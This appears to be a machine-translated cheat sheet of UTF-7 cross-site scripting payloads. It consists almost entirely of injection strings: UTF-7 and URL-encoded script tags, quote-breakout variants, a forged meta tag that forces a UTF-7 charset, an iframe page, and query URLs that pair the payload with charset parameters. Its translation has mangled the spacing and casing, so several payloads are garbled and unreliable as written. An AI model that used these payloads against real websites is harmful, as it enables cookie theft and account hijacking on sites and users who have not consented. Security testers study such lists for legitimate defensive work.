1. Basic Style
<Script> alert (31337) </script>
+ ADw-script + AD4-alert (31337) + ADw-/script + AD4-
<Script> alert (document. cookie) </script>
+ ADw-script + AD4-alert (document. cookie) + ADw-/script + AD4-
+ ADw-script + AD4-alert (document. location) + ADw-/script + AD4-
<Script> alert (document. location) </script>
2. converted URL encoded Style
% 2BADw-script + AD4-alert (document. location) % 2BADw-/script % 2BAD4-
<Script> alert (document. location) </script>
3. Use quotation marks and"
+ ACIAPgA8-script + AD4-alert (document. location) + ADw-/script + AD4APAAi-
"> <Script> alert (document. location) </script> <"
4. URL encoding using quotation marks and"
% 2BACIAPgA8-script % 2BAD4-alert % 28document. location % 29% 2BADw-% 2 Fscript % 2BAD4APAAi-
"> <Script> alert (document. location) </script> <"
5. Inject forged <meta> tags
+ ADw-/title + AD4APA-meta http-equiv + AD0-'content-type' content + AD0-'text/html + ADs-charset + AD0-utf-7 '+ AD4-
</Title> <meta http-equiv = 'content-type' content = 'text/html; charset = utf-7 '>
6. Using UTF-7 iframe
<Html>
<Head>
<Meta http-equiv = "content-type" content = "text/html; charset = utf-7">
</Head>
<Body>
<Iframe src = "http://www.bkjia.com/NOTFOUND/% 2BACIAPgA8-script % 2BAD4-alert % 28document. location % 29% 2BADw-% 2 Fscript % 2BAD4APAAi-"> </iframe>
</Body>
</Html>
7. charset
Http://www.bkjia.com /? Q = % 2BACIAPgA8-script % 2BAD4-alert % 28document. location % 29% 2BADw-% 2 Fscript % 2BAD4APAAi-& oe = Windows-31J
Http://www.bkjia.com /? Q = % 2BACIAPgA8-script % 2BAD4-alert % 28document. location % 29% 2BADw-% 2 Fscript % 2BAD4APAAi-& oe = CP932
Http://www.bkjia.com /? Q = % 2BACIAPgA8-script % 2BAD4-alert % 28document. location % 29% 2BADw-% 2 Fscript % 2BAD4APAAi-& eo = MS932
Http://www.bkjia.com /? Q = % 2BACIAPgA8-script % 2BAD4-alert % 28document. location % 29% 2BADw-% 2 Fscript % 2BAD4APAAi-& cs = jis
Http://www.bkjia.com /? Q = % 2BACIAPgA8-script % 2BAD4-alert % 28document. location % 29% 2BADw-% 2 Fscript % 2BAD4APAAi-& charset = utf8
Http://www.bkjia.com /? Q = % 2BACIAPgA8-script % 2BAD4-alert % 28document. location % 29% 2BADw-% 2 Fscript % 2BAD4APAAi-& enc = sjis
Author: Waiting independently